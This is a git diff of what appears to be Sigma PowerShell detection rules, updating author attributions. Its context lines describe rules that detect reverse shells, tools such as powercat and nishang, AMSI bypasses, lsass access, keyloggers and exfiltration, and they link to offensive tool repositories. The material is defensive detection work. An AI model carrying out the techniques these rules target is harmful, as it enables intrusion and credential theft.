 - https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/16
 tags:
 - attack.credential_access
diff --git a/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml b/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml
index 0db925a1e..662d85a63 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml
@@ -23,7 +23,7 @@ references:
 - https://github.com/samratashok/nishang
 - https://github.com/DarkCoderSc/PowerRunAsSystem/
 - https://github.com/besimorhino/powercat
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/20
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml
index b8f55c2b5..952569b11 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml
@@ -5,7 +5,7 @@ related:
 type: derived
 status: experimental
 description: Detects suspicious PowerShell download command
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2023/01/20
 tags:
diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml
index 6e2d3bb30..794abcad8 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml
@@ -7,7 +7,7 @@ related:
 type: similar
 status: experimental
 description: Detects suspicious PowerShell invocation command parameters
-author: Florian Roth (rule)
+author: Florian Roth (Nextron Systems)
 date: 2017/03/12
 modified: 2023/01/03
 tags:
diff --git a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml
index cbd449cb0..bdb8500e4 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml
@@ -9,7 +9,7 @@ related:
 type: similar
 status: experimental
 description: Detects suspicious PowerShell invocation command parameters
-author: Florian Roth (rule), Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
 date: 2017/03/05
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml
index c922fce07..00ab2ef73 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml
@@ -8,7 +8,7 @@ description: Detects ADDInternals Cmdlet execution. A tool for administering Azu
 references:
 - https://o365blog.com/aadinternals/
 - https://github.com/Gerenios/AADInternals
-author: Austin Songer (@austinsonger), Nasreddine Bencherchali (update)
+author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/23
 tags:
 - attack.execution
diff --git a/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml b/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml
index ed9ee9b54..972d96ce4 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml
@@ -8,7 +8,7 @@ description: Detects usage of the "Add-WindowsCapability" cmdlet to add new wind
 references:
 - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell
 - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/22
 tags:
 - attack.execution
diff --git a/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml b/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml
index 744061a8e..79d02c5f2 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml
@@ -5,7 +5,7 @@ description: Detects code fragments found in small and obfuscated AMSI bypass Po
 references:
 - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/09
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml b/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml
index fa229d87a..ab873afa4 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
 references:
 - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/04
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml b/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml
index be3c5d3bb..987d0f8e9 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects potential exfiltration attempt via audio file using PowerShell
 references:
 - https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/16
 tags:
 - attack.exfiltration
diff --git a/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml b/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
index 4f015b275..569b7a97d 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml
@@ -9,7 +9,7 @@ references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
 - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/17
 tags:
 - attack.discovery
diff --git a/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml b/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
index e95b2ac3e..212142707 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
 references:
 - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/28
 modified: 2022/11/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml b/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
index 2a849fd21..4a67c80cf 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_exchange_mailbox_smpt_forwarding_rule.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.
 references:
 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/26
 tags:
 - attack.exfiltration
diff --git a/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml b/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml
index 07ac82232..575987e23 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_hotfix_enum.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
 references:
 - https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/21
 tags:
 - attack.discovery
diff --git a/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml b/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml
index 12b4ea3eb..8bd15a134 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects powershell scripts that import modules from suspicious directories
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/07
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml b/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml
index ab2894205..c99b16071 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml
@@ -10,7 +10,7 @@ references:
 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
 - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
 - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/26
 tags:
 - attack.exfiltration
diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
index b9324752b..d10f2c78a 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml
@@ -27,7 +27,7 @@ references:
 - https://github.com/samratashok/nishang
 - https://github.com/DarkCoderSc/PowerRunAsSystem/
 - https://github.com/besimorhino/powercat
-author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
+author: Sean Metcalf, Florian Roth (Nextron Systems), Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali (Nextron Systems), Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems), Austin Songer
 date: 2017/03/05
 modified: 2023/01/23
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml b/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml
index baa89ee45..9a1326c6e 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects keywords from well-known PowerShell exploitation frameworks
 references:
 - https://adsecurity.org/?p=2921
-author: Sean Metcalf (source), Florian Roth (rule)
+author: Sean Metcalf (source), Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml b/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml
index 9c2fdf12d..eb61b9663 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects usage of a PowerShell command to dump the live memory of a Windows machine
 references:
 - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2021/09/21
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml b/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml
index d03f82f61..b8aa7b598 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml
@@ -5,7 +5,7 @@ description: Detects PowerShell calling a credential prompt
 references:
 - https://twitter.com/JohnLaTwC/status/850381440629981184
 - https://t.co/ezOTGy1a1G
-author: John Lambert (idea), Florian Roth (rule)
+author: John Lambert (idea), Florian Roth (Nextron Systems)
 date: 2017/04/09
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml b/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml
index 95b10125e..8c3e71d67 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell
 references:
 - https://github.com/JoelGMSec/PSAsyncShell
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/04
 tags:
 - attack.execution
diff --git a/rules/windows/powershell/powershell_script/posh_ps_psattack.yml b/rules/windows/powershell/powershell_script/posh_ps_psattack.yml
index 927e769d9..d7d673c6b 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_psattack.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_psattack.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the use of PSAttack PowerShell hack tool
 references:
 - https://adsecurity.org/?p=2921
-author: Sean Metcalf (source), Florian Roth (rule)
+author: Sean Metcalf (source), Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml b/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml
index 77c40abbb..91f9e597e 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Base64 encoded Shellcode
 references:
 - https://twitter.com/cyb3rops/status/1063072865992523776
-author: David Ledbetter (shellcode), Florian Roth (rule)
+author: David Ledbetter (shellcode), Florian Roth (Nextron Systems)
 date: 2018/11/17
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml b/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml
index fd3eb2972..373c4db15 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects Commandlet names from ShellIntel exploitation scripts.
 references:
 - https://github.com/Shellntel/scripts/
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2023/01/02
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml
index 4e660deeb..4488e2ae1 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
 references:
 - https://github.com/HarmJ0y/DAMP
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/05
 tags:
 - attack.persistence
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml
index adc258a79..1203f0ab5 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
 references:
 - Internal Research
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/09
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml
index 97238f5d8..03a17f1d4 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml
@@ -9,7 +9,7 @@ references:
 - https://twitter.com/oroneequalsone/status/1568432028361830402
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md
 - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/12
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml
index bea931133..1c6a1956b 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_download.yml
@@ -5,7 +5,7 @@ related:
 type: derived
 status: experimental
 description: Detects suspicious PowerShell download command
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml
index fb9d2dcf9..fb6509023 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_export_pfxcertificate.yml
@@ -5,7 +5,7 @@ description: Detects Commandlet that is used to export certificates from the loc
 references:
 - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a
 - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/04/23
 modified: 2023/01/24
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml
index 4c462db62..e93321d51 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml
@@ -5,7 +5,7 @@ description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-
 references:
 - https://twitter.com/nas_bench/status/1537919885031772161
 - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/21
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
index 418a10281..b36d2d4b3 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
 references:
 - https://twitter.com/PythonResponder/status/1385064506049630211
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/04/23
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
index c431c9f3c..72f108610 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
@@ -7,7 +7,7 @@ related:
 type: similar
 status: test
 description: Detects suspicious PowerShell invocation command parameters
-author: Florian Roth (rule)
+author: Florian Roth (Nextron Systems)
 date: 2017/03/12
 modified: 2023/01/03
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
index a35ced0ba..8ab4eb08f 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
@@ -9,7 +9,7 @@ related:
 type: similar
 status: experimental
 description: Detects suspicious PowerShell invocation command parameters
-author: Florian Roth (rule), Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
 date: 2017/03/05
 modified: 2023/01/05
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
index d0796f6d0..785f036b6 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml
@@ -7,7 +7,7 @@ references:
 - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content
 - https://www.virustotal.com/gui/file/720a7ee9f2178c70501d7e3f4bcc28a4f456e200486dbd401b25af6da3b4da62/content
 - https://learn.microsoft.com/en-us/dotnet/api/system.windows.input.keyboard.iskeydown?view=windowsdesktop-7.0
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/04
 tags:
 - attack.collection
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml
index 05a66e50b..9e7a60869 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml
@@ -7,7 +7,7 @@ references:
 - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1
 - https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1
 - https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7
-author: Florian Roth, Perez Diego (@darkquassar)
+author: Florian Roth (Nextron Systems), Perez Diego (@darkquassar)
 date: 2019/02/11
 modified: 2023/01/02
 tags:
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
index f6bb2827d..6a34f746e 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
 references:
 - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/08
 tags:
 - attack.command_and_control
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
index 64e36663e..97243d28e 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml
@@ -5,7 +5,7 @@ related:
 type: similar
 status: experimental
 description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 references:
 - https://twitter.com/Alh4zr3d/status/1580925761996828672
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml
index f9b1a61d4..0d1ef6fc3 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
 references:
 - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/16
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml b/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml
index f9d75a872..f8785f34e 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet
 references:
 - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml b/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml
index f6f4b8e80..1146692ce 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml
@@ -8,7 +8,7 @@ description: Detects usage of the Get-ADUser cmdlet to collect user information
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/17
 tags:
 - attack.discovery
diff --git a/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml b/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml
index 37ab5b8ba..90d9858be 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml
@@ -8,7 +8,7 @@ description: Detects usage of the "Set-Service" powershell cmdlet to configure a
 references:
 - https://twitter.com/Alh4zr3d/status/1580925761996828672
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/17
 tags:
 - attack.persistence
diff --git a/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml b/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml
index d53f5db28..0d94f34e4 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml
@@ -9,7 +9,7 @@ references:
 - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py
